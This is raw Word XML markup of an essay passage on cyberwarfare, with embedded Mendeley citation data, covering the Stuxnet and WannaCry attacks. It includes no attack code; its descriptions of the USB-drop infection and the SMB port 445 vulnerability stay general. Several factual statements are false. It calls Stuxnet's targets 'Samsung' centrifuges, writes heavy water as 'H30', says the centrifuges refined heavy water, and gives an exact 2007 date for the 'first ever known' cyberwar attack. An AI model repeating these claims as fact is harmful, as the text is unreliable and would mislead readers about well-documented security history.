logistics, transport, early warning systems and other vitally important military functions at any time upon receiving an order.","author":[{"dropping-particle":"","family":"Berson","given":"Thomas A.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Denning","given":"Dorothy E.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"IEEE Security and Privacy","id":"ITEM-1","issued":{"date-parts":[["2011"]]},"title":"Cyberwarfare","type":"article"},"uris":["http://www.mendeley.com/documents/?uuid=dd91c288-437d-4544-b7d9-d781d5e2c183"]}],"mendeley":{"formattedCitation":"[8]","plainTextFormattedCitation":"[8]","previouslyFormattedCitation":"[8]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA44DE" w:rsidRPr="00BA44DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E94648" w14:textId="5439F78B" w:rsidR="00276FE0" w:rsidRDefault="00276FE0" w:rsidP="00F22121">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDA82F6" w14:textId="552FB119" w:rsidR="00276FE0" w:rsidRPr="00276FE0" w:rsidRDefault="00276FE0" w:rsidP="00276FE0">
      <w:pPr>
        <w:pStyle w:val="Affiliation"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00276FE0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Stuxnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE65D8">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cyberattack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6714A98C" w14:textId="4FDE73F5" w:rsidR="00EB02C4" w:rsidRDefault="00161DC7" w:rsidP="00F22121">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The first ever known cyber</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>warfare attack was committed by the United States of America (USA)</w:t>
      </w:r>
      <w:r w:rsidR="00276FE0">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="00CE65D8">
        <w:t>November</w:t>
      </w:r>
      <w:r w:rsidR="00276FE0">
        <w:t xml:space="preserve"> the 27</w:t>
      </w:r>
      <w:r w:rsidR="00276FE0" w:rsidRPr="00276FE0">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00276FE0">
        <w:t xml:space="preserve"> 2007 against</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an Iranian nuclear testing facility, the attack was called ‘Stuxnet’ that compromised ‘Samsung’ centrifuge</w:t>
      </w:r>
      <w:r w:rsidR="002E4C22">
        <w:t>s ‘Firmware’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that the Iranians were utilising to refine heavy </w:t>
      </w:r>
      <w:r w:rsidR="00EA31DF">
        <w:t>water (</w:t>
      </w:r>
      <w:r w:rsidR="00836ACE">
        <w:t xml:space="preserve">H30) </w:t>
      </w:r>
      <w:r>
        <w:t>for their nuclear program. Stuxnet was a malware</w:t>
      </w:r>
      <w:r w:rsidR="00276FE0">
        <w:t xml:space="preserve"> worm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> programme</w:t>
      </w:r>
      <w:r w:rsidR="00182D57">
        <w:t xml:space="preserve"> containing a malicious virus as its payload. Stuxnet </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">was instructed to sniff out and find ‘Samsung’ centrifuges which once </w:t>
      </w:r>
      <w:r w:rsidR="00182D57">
        <w:t xml:space="preserve">located would inject </w:t>
      </w:r>
      <w:r w:rsidR="00983560">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00182D57">
        <w:t xml:space="preserve"> payload into the ‘Centrifuge’s’ firmware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00182D57">
        <w:t xml:space="preserve">and then </w:t>
      </w:r>
      <w:r w:rsidR="002E4C22">
        <w:t xml:space="preserve"> instruc</w:t>
      </w:r>
      <w:r w:rsidR="00836ACE">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="002E4C22">
        <w:t xml:space="preserve"> the firmware of these ‘Samsung’ centrifug</w:t>
      </w:r>
      <w:r w:rsidR="002E4C22" w:rsidRPr="00182D57">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="002E4C22">
        <w:t xml:space="preserve"> to rapidly rotate outside of its normal operating parameters to an </w:t>
      </w:r>
      <w:r w:rsidR="002E4C22" w:rsidRPr="002E4C22">
        <w:t>unsustainable</w:t>
      </w:r>
      <w:r w:rsidR="002E4C22">
        <w:t xml:space="preserve"> Revolutions Per Minute (RPM) velocity</w:t>
      </w:r>
      <w:r w:rsidR="00836ACE">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002E4C22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">causing catastrophic damage to </w:t>
      </w:r>
      <w:r w:rsidR="002E4C22">
        <w:t xml:space="preserve">all of </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="002E4C22">
        <w:t xml:space="preserve">ffected </w:t>
      </w:r>
      <w:r w:rsidR="00836ACE">
        <w:t>centrifuges</w:t>
      </w:r>
      <w:r w:rsidR="002E4C22">
        <w:t xml:space="preserve"> and their </w:t>
      </w:r>
      <w:r w:rsidR="00836ACE">
        <w:t xml:space="preserve">important </w:t>
      </w:r>
      <w:r w:rsidR="002E4C22">
        <w:t>contents</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Stuxnet is reported to have set back the Iranian nuclear programme by </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA44DE">
        <w:t>2 years</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which was a success in the eyes of the US government but an eye opener for the rest of the world that </w:t>
      </w:r>
      <w:r w:rsidR="002E4C22">
        <w:t>later learnt of the attack</w:t>
      </w:r>
      <w:r w:rsidR="000A0678">
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidR="00983560">
        <w:t>far-reaching</w:t>
      </w:r>
      <w:r w:rsidR="000A0678">
        <w:t xml:space="preserve"> implications that cybersecurity presents</w:t>
      </w:r>
      <w:r w:rsidR="00983560">
        <w:t xml:space="preserve"> within the modern world</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EB02C4" w:rsidRPr="00EB02C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D003B7" w14:textId="77777777" w:rsidR="00EB02C4" w:rsidRDefault="00EB02C4" w:rsidP="00F22121">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B9E567" w14:textId="1590C5F8" w:rsidR="00257C56" w:rsidRDefault="00EB02C4" w:rsidP="00F22121">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Stuxnet although a malware programme, found its way into the ‘Air-gapped’ computer systems</w:t>
      </w:r>
      <w:r w:rsidR="005D5096">
        <w:t xml:space="preserve"> (a computer that is not connected to a WAN and/or LAN) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  within the Iranian nuclear testing facility using a ‘Social Engineering’ technique, that was conducted by leaving </w:t>
      </w:r>
      <w:r w:rsidR="005D5096">
        <w:t xml:space="preserve">several </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Universal Serial Bus-port (USB) flash drives </w:t>
      </w:r>
      <w:r w:rsidR="00276FE0">
        <w:t xml:space="preserve">with ‘Stuxnet’ </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00276FE0">
        <w:t xml:space="preserve">mbedded, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scattered around the carpark of the </w:t>
      </w:r>
      <w:r w:rsidR="00276FE0">
        <w:t>nuclear</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> facility in the hope that an employee </w:t>
      </w:r>
      <w:r>
        <w:t>would pick</w:t>
      </w:r>
      <w:r w:rsidR="005D5096">
        <w:t xml:space="preserve"> one up</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and use</w:t>
      </w:r>
      <w:r w:rsidR="005D5096">
        <w:t xml:space="preserve"> it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> within the facility</w:t>
      </w:r>
      <w:r w:rsidR="005D5096">
        <w:t xml:space="preserve"> not knowing what it contained</w:t>
      </w:r>
      <w:r w:rsidR="00983560">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00257C56">
        <w:t xml:space="preserve">which came to fruition. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387DAD86" w14:textId="77777777" w:rsidR="00257C56" w:rsidRDefault="00257C56" w:rsidP="00F22121">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48157691" w14:textId="69846491" w:rsidR="00EB02C4" w:rsidRDefault="00257C56" w:rsidP="00F22121">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Once the USB flash drive had been plugged into the internal ‘Air-gapped’ nuclear facility computer terminal that was connected to the LAN of the facility the malware was activated</w:t>
      </w:r>
      <w:r w:rsidR="00EB02C4">
        <w:t>. Stuxnet did not only give birth to ‘Cyberwarfare’ but proved that not even ‘Air-gapped’ computer systems were safe from exploitation by malicious actors</w:t>
      </w:r>
      <w:r w:rsidR="00276FE0">
        <w:t xml:space="preserve"> because of the human manipulation factor that governments at the time of the attack did not account for</w:t>
      </w:r>
      <w:r w:rsidR="00EB02C4">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F436D6" w14:textId="77777777" w:rsidR="00276FE0" w:rsidRDefault="00276FE0" w:rsidP="00F22121">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D657104" w14:textId="2415C0AF" w:rsidR="00161DC7" w:rsidRDefault="00161DC7" w:rsidP="00F22121">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stuxnet </w:t>
      </w:r>
      <w:r w:rsidR="00BD2ABF">
        <w:t>revealed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the reliance within computer</w:t>
      </w:r>
      <w:r w:rsidR="00EB02C4">
        <w:t xml:space="preserve"> systems</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="00BD2ABF">
        <w:t xml:space="preserve">governments around the world took </w:t>
      </w:r>
      <w:r>
        <w:t>for granted</w:t>
      </w:r>
      <w:r w:rsidR="00EB02C4">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD2ABF">
        <w:t>in which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00BD2ABF">
        <w:t xml:space="preserve"> real-world physical </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">security implications </w:t>
      </w:r>
      <w:r w:rsidR="00BD2ABF">
        <w:t xml:space="preserve">were vastly </w:t>
      </w:r>
      <w:r>
        <w:t>underestimated</w:t>
      </w:r>
      <w:r w:rsidR="00BD2ABF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1109/MSP.2011.67","ISSN":"15407993","abstract":"Ralph Langner, an expert in industrial control system security, explores the technical side of Stuxnet, dangerous malware that attacks SCADA systems.","author":[{"dropping-particle":"","family":"Langner","given":"Ralph","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"IEEE Security and Privacy","id":"ITEM-1","issued":{"date-parts":[["2011"]]},"title":"Stuxnet: Dissecting a cyberwarfare weapon","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=fd9d0bf4-5b60-48c0-93fb-c9bbada2f589"]}],"mendeley":{"formattedCitation":"[9]","plainTextFormattedCitation":"[9]","previouslyFormattedCitation":"[9]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA44DE" w:rsidRPr="00BA44DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1080/00396338.2011.555586","ISSN":"0039-6338","abstract":"The discovery in June 2010 that a cyber worm dubbed ?Stuxnet? had struck the Iranian nuclear facility at Natanz suggested that, for cyber war, the future is now. Yet more important is the political and strategic context in which new cyber threats are emerging, and the effects the worm has generated in this respect. Perhaps most striking is the confluence between cyber crime and state action. States are capitalising on technology whose development is driven by cyber crime, and perhaps outsourcing cyber attacks to non-attributable third parties, including criminal organisations. Cyber offers great potential for striking at enemies with less risk than using traditional military means. It is unclear how much the Stuxnet program cost, but it was almost certainly less than the cost of single fighter-bomber. Yet if damage from cyber attacks can be quickly repaired, careful strategic thought is required in comparing the cost and benefits of cyber versus traditional military attack. One important benefit of cyber attack may be its greater opportunity to achieve goals such as retarding the Iranian nuclear programme without causing the loss of life or injury to innocent civilians that air strikes would seem more likely to inflict. Nevertheless, cyber attacks do carry a risk of collateral damage, with a risk of political blowback if the attacking parties are identified. Difficulty in identifying a cyber attacker presents multiple headaches for responding. A key strategic risk in cyber attack, finally, lies in potential escalatory responses. Strategies for using cyber weapons like Stuxnet need to take into account that adversaries may attempt to turn them back against us. The discovery in June 2010 that a cyber worm dubbed ?Stuxnet? had struck the Iranian nuclear facility at Natanz suggested that, for cyber war, the future is now. Yet more important is the political and strategic context in which new cyber threats are emerging, and the effects the worm has generated in this respect. Perhaps most striking is the confluence between cyber crime and state action. States are capitalising on technology whose development is driven by cyber crime, and perhaps outsourcing cyber attacks to non-attributable third parties, including criminal organisations. Cyber offers great potential for striking at enemies with less risk than using traditional military means. It is unclear how much the Stuxnet program cost, but it was almost certainly less than the cost of single fighter-bomb…","author":[{"dropping-particle":"","family":"Farwell","given":"James P.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Rohozinski","given":"Rafal","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Survival","id":"ITEM-1","issued":{"date-parts":[["2011"]]},"title":"Stuxnet and the Future of Cyber War","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=ade1e788-4139-45e8-9b08-94657c6740ba"]}],"mendeley":{"formattedCitation":"[10]","plainTextFormattedCitation":"[10]","previouslyFormattedCitation":"[10]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA44DE" w:rsidRPr="00BA44DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AD4C11" w14:textId="77777777" w:rsidR="002D2048" w:rsidRDefault="002D2048" w:rsidP="002D2048">
      <w:pPr>
        <w:spacing w:line="120" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A033144" w14:textId="2D8B5459" w:rsidR="00CE65D8" w:rsidRPr="002D2048" w:rsidRDefault="002D2048" w:rsidP="002D2048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WannaCry</w:t>
      </w:r>
      <w:r w:rsidRPr="002D2048">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cyberattack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BABBFB" w14:textId="77777777" w:rsidR="002D2048" w:rsidRDefault="002D2048" w:rsidP="002D2048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="72" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9BFB74" w14:textId="01CA9C3E" w:rsidR="0064592D" w:rsidRDefault="002D2048" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The most</w:t>
      </w:r>
      <w:r w:rsidR="00CE65D8">
        <w:t xml:space="preserve"> recent major cybersecurity attack called ‘WannaCry’ took place across </w:t>
      </w:r>
      <w:r w:rsidR="00983560">
        <w:t>the majority</w:t>
      </w:r>
      <w:r w:rsidR="00CE65D8">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00C845A3">
        <w:t xml:space="preserve">countries in </w:t>
      </w:r>
      <w:r w:rsidR="00CE65D8">
        <w:t>Europe</w:t>
      </w:r>
      <w:r w:rsidR="00C845A3">
        <w:t xml:space="preserve"> and a few countries within Asia, such as China and India. The ‘WannaCry’ attack took </w:t>
      </w:r>
      <w:r w:rsidR="00B9708C">
        <w:t>place on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the 12</w:t>
      </w:r>
      <w:r w:rsidRPr="002D2048">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of May 2017 that was </w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t>suspected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to be initiated by the North Korean government</w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t xml:space="preserve"> although this could not be 100% confirmed which is the nature of a professional</w:t>
      </w:r>
      <w:r w:rsidR="004F1D25">
        <w:t xml:space="preserve">ly </w:t>
      </w:r>
      <w:r w:rsidR="00983560">
        <w:t>executed</w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t xml:space="preserve"> cybersecurity attack</w:t>
      </w:r>
      <w:r w:rsidR="00983560">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D82FE1">
        <w:t xml:space="preserve"> that leaves little to no trace of the originating attacker</w:t>
      </w:r>
      <w:r w:rsidR="00983560">
        <w:t xml:space="preserve"> or true country of origin. This uncertainty</w:t>
      </w:r>
      <w:r w:rsidR="009D5FCE">
        <w:t xml:space="preserve"> leads to cold war paranoi</w:t>
      </w:r>
      <w:r w:rsidR="002123F9">
        <w:t xml:space="preserve">a of </w:t>
      </w:r>
      <w:r w:rsidR="0064592D">
        <w:t xml:space="preserve">accusations </w:t>
      </w:r>
      <w:r w:rsidR="00983560">
        <w:t xml:space="preserve">and denials </w:t>
      </w:r>
      <w:r w:rsidR="0064592D">
        <w:t xml:space="preserve">between </w:t>
      </w:r>
      <w:r w:rsidR="00FD2FA7">
        <w:t>governments</w:t>
      </w:r>
      <w:r w:rsidR="0064592D">
        <w:t xml:space="preserve"> as previously discussed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1080/13567888.2017.1335101","ISSN":"1356-7888","abstract":"The worldwide 'WannaCry' ransomware attack of uncertain origin earlier this month did little lasting damage. Nevertheless, it indicated widespread vulnerability to threats from outlier states and non-state actors, which pose the greatest risks to cyber security. While governments and industry should adopt a more systematic and anticipatory approach to minimising such threats, they are unlikely to treat the attack as a major wake-up call.","author":[{"dropping-particle":"","family":"Lang","given":"J","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Strategic Comments","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"The WannaCry ransomware attack","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=cb514e9f-d2db-4b5d-8b8b-e5b8e5608bfc"]}],"mendeley":{"formattedCitation":"[11]","plainTextFormattedCitation":"[11]","previouslyFormattedCitation":"[11]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA44DE" w:rsidRPr="00BA44DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04798E84" w14:textId="77777777" w:rsidR="0064592D" w:rsidRDefault="0064592D" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4905CD7C" w14:textId="543C705E" w:rsidR="008B35A0" w:rsidRDefault="002D2048" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="0064592D">
        <w:t xml:space="preserve">WannaCry </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attack </w:t>
      </w:r>
      <w:r w:rsidR="0064592D">
        <w:t xml:space="preserve">was a sophisticated 3-pronged attack that </w:t>
      </w:r>
      <w:r w:rsidR="00CE65D8">
        <w:t>severely crippled the United Kingdoms (UK) National Health Service (</w:t>
      </w:r>
      <w:r>
        <w:t>NHS) and other institutions around Europe</w:t>
      </w:r>
      <w:r w:rsidR="0064592D">
        <w:t>. The attack was only possible because of a known inherent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerability within</w:t>
      </w:r>
      <w:r w:rsidR="00E3559E">
        <w:t xml:space="preserve"> unpatched</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows server </w:t>
      </w:r>
      <w:r w:rsidR="002A443D">
        <w:t>2012, Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7 client Operating Systems (OS) previous</w:t>
      </w:r>
      <w:r w:rsidR="00C35CC1">
        <w:t xml:space="preserve"> Windows OS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> versions</w:t>
      </w:r>
      <w:r w:rsidR="00E3559E">
        <w:t xml:space="preserve">. The vulnerability for the WannaCry attack to </w:t>
      </w:r>
      <w:r w:rsidR="00C35CC1">
        <w:t xml:space="preserve">remotely </w:t>
      </w:r>
      <w:r w:rsidR="00E3559E">
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="00C35CC1">
        <w:t xml:space="preserve"> these OS’s</w:t>
      </w:r>
      <w:r w:rsidR="00E3559E">
        <w:t xml:space="preserve"> was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> located within the Server Message Block (SMB) </w:t>
      </w:r>
      <w:r w:rsidR="008B35A0">
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidR="00014E39">
        <w:t>445.</w:t>
      </w:r>
      <w:r w:rsidR="0064592D">
        <w:t xml:space="preserve"> This</w:t>
      </w:r>
      <w:r w:rsidR="00C35CC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00986326">
        <w:t>architectural</w:t>
      </w:r>
      <w:r w:rsidR="0064592D">
        <w:t xml:space="preserve"> vulnerability allows </w:t>
      </w:r>
      <w:r>
        <w:t>remote packet injection into the SMB communications port</w:t>
      </w:r>
      <w:r w:rsidR="008B35A0">
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r w:rsidR="00746AD4">
        <w:t>permitted</w:t>
      </w:r>
      <w:r w:rsidR="008B35A0">
        <w:t xml:space="preserve"> the ‘WannaCry’ malware to exploit </w:t>
      </w:r>
      <w:r w:rsidR="0064592D">
        <w:t>the aforementioned systems</w:t>
      </w:r>
      <w:r w:rsidR="008B35A0">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"9781786041470","abstract":"'Ordered by the House of Commons to be printed on 25 October 2017.' 'This report has been prepared under Section 6 of the National Audit Act 1983 for presentation to the House of Commons in accordance with Section 9 of the Act.' 'Sir Amyas Morse KCB, Comptroller and Auditor General, National Audit Office, 24 October 2017.' At head of title: 'Department of Health'.","author":[{"dropping-particle":"","family":"Comptroller and Auditor General","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"NAO","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"Investigation: WannaCry cyber attack and the NHS","type":"report"},"uris":["http://www.mendeley.com/documents/?uuid=0aa01c99-2dfc-4383-bfa1-7ca72d635a60"]}],"mendeley":{"formattedCitation":"[12]","plainTextFormattedCitation":"[12]","previouslyFormattedCitation":"[12]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA44DE" w:rsidRPr="00BA44DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB65B59" w14:textId="60DB1D87" w:rsidR="00746AD4" w:rsidRDefault="00746AD4" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC68D72" w14:textId="475526FE" w:rsidR="00746AD4" w:rsidRDefault="00746AD4" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="000929F0">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WannCry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000929F0">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Malware was packaged a</w:t>
      </w:r>
      <w:r w:rsidR="00C35CC1">
        <w:t>s a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000929F0">
        <w:t>three-pronged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attack; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E131A37" w14:textId="6458EFBD" w:rsidR="00746AD4" w:rsidRPr="00746AD4" w:rsidRDefault="00746AD4" w:rsidP="00746AD4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746AD4">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Eternal Blue Remote Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372781C9" w14:textId="105DF9AA" w:rsidR="00330B7F" w:rsidRDefault="008B35A0" w:rsidP="00CE65D8">
      <w:pPr>
        <w:jc w:val="both"/>
